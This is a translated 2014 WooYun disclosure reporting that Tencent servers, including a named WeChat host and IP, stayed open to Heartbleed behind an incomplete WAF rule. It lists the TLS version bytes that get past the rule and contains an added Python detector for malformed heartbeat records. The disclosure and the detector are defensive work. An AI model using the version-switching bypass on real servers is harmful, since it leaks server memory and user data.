Vulnerability Summary

Defect ID: wooyun-2014-057996

Title: Large numbers of Tencent servers still unpatched for the OpenSSL Heartbleed vulnerability, allowing data leakage

Vendor: Tencent

Author: 路人甲

Submitted: 2014-04-21 22:32

Fixed: 2014-06-05 22:33

Published: 2014-06-05 22:33

Vulnerability type: Sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2014-04-21: Details sent to the vendor, awaiting vendor handling
2014-04-22: Vendor confirmed; details visible to the vendor only
2014-05-02: Details disclosed to core white hats and domain experts
2014-05-12: Details disclosed to regular white hats
2014-05-22: Details disclosed to intern white hats
2014-06-05: Details disclosed to the public

Summary:

Large numbers of Tencent servers still unpatched for the OpenSSL Heartbleed vulnerability, allowing data leakage

Details:

# Description
Many Tencent servers appear to have been "fixed" only by adding a WAF rule that intercepts the public exploit.
That WAF rule can be bypassed, or rather is incomplete: it does not catch the exploit when it is sent under a particular TLS version.

# TLS record-layer version bytes the exploit can be sent under. A filter that
# matches only one of these version strings lets the others through.
version = []
version.append(['SSL 3.0', '03 00'])
version.append(['TLS 1.0', '03 01'])
version.append(['TLS 1.1', '03 02'])
version.append(['TLS 1.2', '03 03'])
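The gap described above, that a single-version signature misses the same malformed heartbeat under the other three record versions, is easier to see with a version-independent check. The following is an added detection example, not code from the original report: it parses a TLS record, applies the RFC 6520 length rule to heartbeat records under any of the four versions, and contrasts that with a constructed TLS 1.1-only signature. The sample records are constructed, not captured traffic.

```python
import struct

# TLS record-layer versions listed in the report; a WAF rule keyed to just
# one of these byte pairs misses heartbeat records sent under the others.
TLS_VERSIONS = {
    b"\x03\x00": "SSL 3.0",
    b"\x03\x01": "TLS 1.0",
    b"\x03\x02": "TLS 1.1",
    b"\x03\x03": "TLS 1.2",
}
HEARTBEAT_CONTENT_TYPE = 24  # RFC 6520 record content type
MIN_PADDING = 16             # RFC 6520 minimum padding after the payload


def inspect_heartbeat_record(record: bytes):
    """Parse one TLS record. For heartbeat records return
    (version_name, declared_payload_len, bytes_actually_present, malformed);
    for any other record type return None. 'malformed' is True when the
    declared payload length cannot fit in the record (the Heartbleed shape)."""
    if len(record) < 5:
        return None
    content_type = record[0]
    version = TLS_VERSIONS.get(record[1:3], "unknown")
    record_len = struct.unpack("!H", record[3:5])[0]
    if content_type != HEARTBEAT_CONTENT_TYPE:
        return None
    body = record[5:5 + record_len]
    if len(body) < 3:                      # no room for type + payload_length
        return (version, None, len(body), True)
    declared_len = struct.unpack("!H", body[1:3])[0]
    present = len(body) - 3                # bytes after the type/length fields
    # RFC 6520: receivers must discard the message when payload_length plus
    # at least 16 bytes of padding exceeds what the record carries.
    return (version, declared_len, present, declared_len + MIN_PADDING > present)


def single_version_rule(record: bytes) -> bool:
    """A signature that fires only for heartbeat records under TLS 1.1,
    constructed here to show the gap the report describes."""
    return record.startswith(b"\x18\x03\x02")


# Constructed sample records (not captured traffic).
BENIGN_TLS12 = (b"\x18\x03\x03" + struct.pack("!H", 23)
                + b"\x01" + struct.pack("!H", 4) + b"ping" + b"\x00" * 16)
MALFORMED_TLS10 = b"\x18\x03\x01" + struct.pack("!H", 3) + b"\x01" + struct.pack("!H", 0x4000)

if __name__ == "__main__":
    for name, rec in (("benign TLS 1.2", BENIGN_TLS12), ("malformed TLS 1.0", MALFORMED_TLS10)):
        print(name, inspect_heartbeat_record(rec), "narrow rule hit:", single_version_rule(rec))
```

The malformed TLS 1.0 record is flagged by the length check but not by the TLS 1.1-only signature, which is exactly the incomplete-rule situation the report points at.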


# Affected hosts (a brief sample; the full list is not included)



Proof of vulnerability:

# res.wx.qq.com, a WeChat server

[screenshot: weixin.jpg]


# Leaked data

IP: 112.90.136.154:443
OpenSSL information disclosure present:

Fix recommendation:

You know best.

Copyright: please credit 路人甲@乌云 when reposting


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-04-22 00:56

Vendor reply:

Thank you very much for your report. We have started handling the issue, and we appreciate everyone's attention to the security of Tencent's services. If you have any questions, please let us know and a dedicated person will follow up.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2014-04-21 22:41 | MeirLin ( Intern white hat | Rank:96 Vulns:30 | account on loan)

    After all this time it's still unpatched, and at Tencent of all places. I'm stunned.


  2. 2014-04-21 22:44 | 泳少 ( Regular white hat | Rank:231 Vulns:79 | ★ Once you set out on the road of dreams, you finish it even on your knees...)

    Holy... the amazing 路人甲

  3. 2014-04-21 22:50 | zj1244 ( Regular white hat | Rank:273 Vulns:33 | 小葵)

    The amazing 路人甲

  4. 2014-04-21 22:55 | 金枪银矛小霸王 ( Regular white hat | Rank:103 Vulns:25 | A monkey who can't dig holes isn't a good student)

    openssl... another all-nighter

  5. 2014-04-21 23:01 | xsser Certified white hat ( Regular white hat | Rank:254 Vulns:18 | When I look back on it all, will this world be alright?)

    Heh

  6. 2014-04-21 23:09 | 浮生若梦 ( Passerby | Rank:7 Vulns:7 | 浮生若梦)

    Haha, afraid of getting a knock on the door, so he became 路人甲.

  7. 2014-04-21 23:14 | 小夜 ( Passerby | Rank:15 Vulns:8 | The long days)

    The reporter is a Lei Feng; I could tell at a glance.

  8. 2014-04-21 23:23 | px1624 ( Regular white hat | Rank:1036 Vulns:175 | px1624)

    So impressive!

  9. 2014-04-22 00:54 | 死亡歌颂者 ( Passerby | Rank:2 Vulns:3 | Following internet security, building a civilized online platform.)

    路人甲 exposing vulnerabilities, very good

  10. 2014-04-22 09:00 | 围剿 ( Passerby | Rank:17 Vulns:5 | Evil decimal)

    This really shouldn't happen

  11. 2014-04-22 11:16 | along ( Intern white hat | Rank:45 Vulns:7 | Following information security, Along)

    After all this time, and still so many. Ugh.

  12. 2014-04-22 14:39 | 摄影会长 ( Intern white hat | Rank:81 Vulns:14 | I'm a sock puppet!)

    How did someone's score suddenly jump by 20? Haha

  13. 2014-04-22 14:48 | 猪猪侠 Certified white hat ( Core white hat | Rank:3224 Vulns:254 | You already have so many super lollipops, what do you need freedom for?)

    @摄影会长 heh

  14. 2014-04-22 16:06 | 摄影会长 ( Intern white hat | Rank:81 Vulns:14 | I'm a sock puppet!)

    @猪猪侠 heh, don't get me wrong, I'm your fan now

  15. 2014-04-25 15:35 | Mr .LZH ( Regular white hat | Rank:583 Vulns:75 | Non-girls please don't bother me···)

    @猪猪侠 shame on you for hiding your identity

  16. 2014-04-25 16:10 | zeracker Certified white hat ( Core white hat | Rank:1068 Vulns:137 | More WooYun, more opportunities! WeChat public account id:a301zls ...)

    Zhou Hongyi: First, we hope Tencent fixes the vulnerability as soon as possible and genuinely protects the security of user information; second, 360 is willing to provide Tencent with security technical support. If needed, please contact us as soon as possible.

  17. 2014-05-12 09:41 | wefgod ( Regular white hat | Rank:1807 Vulns:179 | Out of my depth)

    Reminder: your level is sufficient, but you cannot view vulnerabilities from white hats whose Rank is higher than your own (you can wait for further disclosure or pay 10 WooYun coins to view early). So 路人甲's level is higher after all, huh.

  18. 2014-06-06 10:01 | tenzy ( Regular white hat | Rank:176 Vulns:21 | Need not to know)

    Zhou Hongyi: First, we hope Tencent fixes the vulnerability as soon as possible and genuinely protects the security of user information; second, 360 is willing to provide Tencent with security technical support. If needed, please contact us as soon as possible.